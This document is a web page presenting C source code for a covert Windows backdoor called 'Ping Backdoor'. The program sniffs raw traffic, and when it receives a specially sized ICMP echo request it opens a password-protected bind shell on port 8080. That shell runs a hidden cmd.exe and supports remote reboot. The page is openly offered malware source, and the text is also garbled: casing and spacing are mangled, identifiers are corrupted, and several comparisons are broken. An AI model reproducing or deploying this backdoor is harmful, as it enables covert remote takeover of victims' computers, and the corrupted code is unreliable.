Extremely concealed source code of the ping Backdoor

Extremely concealed Ping BackdoorSource code

# Include <stdio. h>

# Include <stdlib. h>

# Include <winsock2.h>

# Include <ws2tcpip. h>

# Include <mstcpip. h>

# Define ICMP_Echo 8 // The type of ICMP echo request message is 8

# Define ICMP_ECHOREPLY 0 // The type value of the ICMP echo response packet is 0

# Define sniffer_icmp_size 101 // large for listening to ICMP packets?

# Define bind_port 8080 // default bind shell Port

# Define max_packet 10000 // What is the maximum ICMP packet size?

# Define def_password "givemeshell! "// Default password

# Define xmalloc (s) heapalloc (getprocessheap (), heap_zero_memory, (s ))

// Define the IP Header

Typedef struct iphdr

{

Unsigned char h_verlen; // 4-bit header length, 4-bit IP address version 1

Unsigned char TOS; // 8-bit service type TOS 1

Unsigned short total_len; // The total length of 16 bits (in bytes) 2

Unsigned short ident; // 16-bit ID 2

Unsigned short frag_and_flags; // 3-digit flag 2

Unsigned char TTL; // 8-bit TTL 1

Unsigned char proto; // 8-bit protocol (TCP, UDP, or other) 1

Unsigned short checksum; // 16-bit IP header checksum 2

Unsigned int sourceip; // 32-bit source IP address 4

Unsigned int destip; // 32-bit destination IP address 4

} Ipheader; // IP header length: 20

// Define the ICMP Header

Typedef struct _ ihdr

{

Unsigned char I _type; // 8-bit type 1

Unsigned char I _code; // 8-bitCode1

Unsigned short I _cksum; // 16-bit checksum and 2

Unsigned short I _id; // identification number (identified by process number) 2

Unsigned short I _seq; // message serial number 2

} Icmpheader; // ICMP Header Length: 8

Int sniffer (); // listen to ICMP?

Void decode_sniffer (char *, Int, struct sockaddr_in *); // simple sniffer unpackProgram

Int bindshell (); // bind Shell

DWORD dwbufferlen [10];

DWORD dwbufferinlen = 1;

DWORD dwbytesreturned = 0;

Handle bindthread;

// Main icmpdoor Function

Int main (INT argc, char ** argv)

{

Wsadata;

Int retval;

// Socket Initialization

If (retval = wsastartup (makeword (2, 2), & wsadata ))! = 0)

{

Printf ("wsastartup failed: % d \ n", retval );

Exit (-1 );

}

// Start sniffer

Sniffer ();

// Socket ends

Wsacleanup ();

Return 0;

}

// Main function of sniffer

Int sniffer ()

{

Int packsize = sniffer_icmp_size;

Socket socksniffer;

Struct sockaddr_in DEST, from;

Struct hostent * HP;

Int sread;

Int fromlen = sizeof (from );

Unsigned char localname [256];

Char * recvbuf;

// Create an original socket to accept all received packets (sniffer)

If (socksniffer = wsasocket (af_inet, sock_raw, ipproto_ip, null, 0, wsa_flag_overlapped) = invalid_socket)

{

Printf ("wsasocket () failed: % d \ n", wsagetlasterror ());

Return-1;

}

// Obtain the local address

Gethostname (char *) localname, sizeof (localname)-1 );

If (HP = gethostbyname (char *) localname) = NULL)

{

Return-1;

}

Memset (& DEST, 0, sizeof (DEST ));

Memcpy (& DeST. sin_addr.s_addr, HP-> h_addr_list [0], HP-> h_length); // TCP sniffing options

DeST. sin_family = af_inet;

DeST. sin_port = htons (8000); // specify any port

// Socket bind

BIND (socksniffer, (psockaddr) & DEST, sizeof (DEST ));

// Set socket to accept all packets

Wsaioctl (socksniffer, sio_rcvall, & dwbufferinlen, sizeof (dwbufferinlen), & dwbufferlen,

Sizeof (dwbufferlen), & dwbytesreturned, null, null );

// Allocate the socket receiving buffer size to max_packet

Recvbuf = (char *) xmalloc (max_packet );

Printf ("sniffer OK! ");

// The size of the loop listener package

While (1)

{

// Read data

Sread = recvfrom (socksniffer, recvbuf, max_packet, 0, (struct sockaddr *) & from, & fromlen );

// If an error occurs while reading data

If (sread = socket_error | sread <0)

{

If (wsagetlasterror () = wsaetimedout)

{

Continue;

}

Printf ("recvfrom failed: % d \ n", wsagetlasterror ());

Return-1;

}

Else

// If (sread> = 28)

// If the size of the read data = the size of the listener package + 28

If (sread = packsize + 28)

{

// Send the received data to the sniffer unpacking program for processing.

Decode_sniffer (recvbuf, sread-28, & from );

}

}

Return 1;

}

// Simple sniffer unpacking program

Void decode_sniffer (char * Buf, int bytes, struct sockaddr_in * From)

{

Icmpheader * icmphdr;

// The ICMP header address equals the length of the BUF + IP header: BUF + 20

Icmphdr = (icmpheader *) (BUF + sizeof (ipheader ));

/*

Printf ("\ r \ n % d bytes from % s,", bytes, inet_ntoa (from-> sin_addr); // retrieve the received data

Printf ("icmp_type: % d", icmphdr-> I _type); // check type

Printf ("icmp_seq: % d \ r \ n", icmphdr-> I _seq); // retrieve the serial number

//? Outbound data segment BUF + 28 + I

For (INT I = 0; I <bytes-1; I ++)

{

Printf ("% C", * (BUF + sizeof (ipheader) + sizeof (icmpheader) + I ));

}

*/

// If (icmphdr-> I _type = ICMP_Echo | icmphdr-> I _type = ICMP_ECHOREPLY)

// Determine if the packet is an ICMP request packet

If (icmphdr-> I _type = ICMP_Echo)

{

// Bind Shell

Bindshell ();

// DWORD bid;

// Bindthread = createthread (null, 0, bindshell, 0, 0, & bid );

}

Else

Printf ("\ r \ n get other packets! ");

Return;

}

// Bind shell function

Int bindshell (){

Int bport = bind_port;

Socket bindserver, getclient;

Struct sockaddr_in addrserver, addrclient;

Char buff [4096];

Char * messages = "\ r \ n ====================== Ping backdoor v0.1 ==== ===============================\ r \ n ========== code by lion.

Welcome to <a href = 'HTTP: // www.cnhonker.net 'target = _ blank> http://www.cnhonker.net </a> ===========\ r \ n ";

Char * getpass = "\ r \ n your password :";

Char * passok = "\ r \ n OK! Please enter :";

Char * nothispass = "\ r \ n sorry, your password not right. \ r \ n ";

Char * exitok = "\ r \ n exit OK! \ R \ n ";

Char * rebootok = "\ r \ n reboot now! \ R \ n ";

// Create a socket

Bindserver = socket (af_inet, sock_stream, ipproto_tcp );

// Specify the server address and port

Addrserver. sin_family = af_inet;

Addrserver. sin_port = htons (bport );

Addrserver. sin_addr.s_addr = addr_any;

// Set timeout

Int timeout = 60000;

Setsockopt (bindserver, sol_socket, so_rcvtimeo, (char *) & timeout, sizeof (timeout ));

// Set the reuse Port

Uint breuser = 1;

Setsockopt (bindserver, sol_socket, so_reuseaddr, (char *) & breuser, sizeof (breuser ));

// Listening port

BIND (bindserver, (struct sockaddr *) & addrserver, sizeof (addrserver ));

Listen (bindserver, 2 );

Printf ("\ r \ n bind port on % d OK.", bport );

// Accept client connection

Int ilen = sizeof (addrclient );

// Receives one connection

Getclient = accept (bindserver, (struct sockaddr *) & addrclient, & ilen );

If (getclient! = Invalid_socket)

{

// If there is a connection, set the delay to 60 s.

Int itimeout = 60000;

Setsockopt (getclient, sol_socket, so_rcvtimeo, (char *) & itimeout, sizeof (itimeout ));

}

Else

Return-1;

// Write welcome information

Send (getclient, messages, strlen (messages), 0 );

// WRITE password verification information

Send (getclient, getpass, strlen (getpass), 0 );

// Receive data

Recv (getclient, buff, 0 );

// Verify the password

If (! (Strstr (buff, def_password )))

{

// If the password is incorrect, write the Password error message

Send (getclient, nothispass, strlen (nothispass), 0 );

Printf ("\ r \ n password not right! ");

Closesocket (getclient );

Closesocket (bindserver );

Return-1;

}

// Write verification information

Send (getclient, passok, strlen (passok), 0 );

// Create two anonymous Pipelines

Handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;

Unsigned long lbytesread;

Security_attributes SA;

SA. nlength = 12;

SA. lpsecuritydescriptor = 0;

SA. binherithandle = true;

Createpipe (& hreadpipe1, & hwritepipe1, & SA, 0 );

Createpipe (& hreadpipe2, & hwritepipe2, & SA, 0 );

Startupinfo siinfo;

Char character line [] = "cmd.exe ";

Process_information processinformation;

Zeromemory (& siinfo, sizeof (siinfo ));

Siinfo. dwflags = startf_useshowwindow | startf_usestdhandles;

Siinfo. wshowwindow = sw_hide;

Siinfo. hstdinput = hreadpipe2; // read the data written by the socket to pipe2

Siinfo. hstdoutput = siinfo. hstderror = hwritepipe1; // write data here

Printf ("\ r \ n pipe create OK! ");

// Create a cmd process that reads data from hreadpipe2 and writes data to hwritepipe1

Int bread = CreateProcess (null, cmdline, null, & siinfo, & processinformation );

While (1)

{

// Check whether data is returned in the MPs queue

Int ret = peeknamedpipe (hreadpipe1, buff, 1024, & lbytesread );

If (lbytesread)

{

// Read data from the pipeline hreadpipe1

Ret = readfile (hreadpipe1, buff, lbytesread, & lbytesread, 0 );

If (! RET) break;

// Write the data read from the pipeline hreadpipe1 to the getclient

Ret = Send (getclient, buff, lbytesread, 0 );

If (Ret <= 0) break;

}

Else

{

// If the getclient connection receives data

Lbytesread = Recv (getclient, buff, 1024,0 );

If (lbytesread <= 0) break;

// Write the data read from the getclient connection to hwritepipe2

Ret = writefile (hwritepipe2, buff, lbytesread, & lbytesread, 0 );

If (lbytesread> 4 & buff [0] = 'E' & buff [1] = 'X' & buff [2] = 'I '&& buff [3] = 'T ')

{

// Write and exit Information

Send (getclient, exitok, strlen (exitok), 0 );

Closesocket (getclient );

Closesocket (bindserver );

Return 1;

}

Else if (lbytesread> 6 & buff [0] = 'R' & buff [1] = 'E' & buff [2] = 'B '& & buff [3] = 'O '&&

Buff [1] = 'O' & buff [2] = 'T ')

{

// Write restart

Send (getclient, rebootok, strlen (rebootok), 0 );

Closesocket (getclient );

Closesocket (bindserver );

Exitwindowsex (ewx_reboot, null );

Return 1;

}

If (! RET) break;

}

}

Closesocket (getclient );

Closesocket (bindserver );

Return 1;

}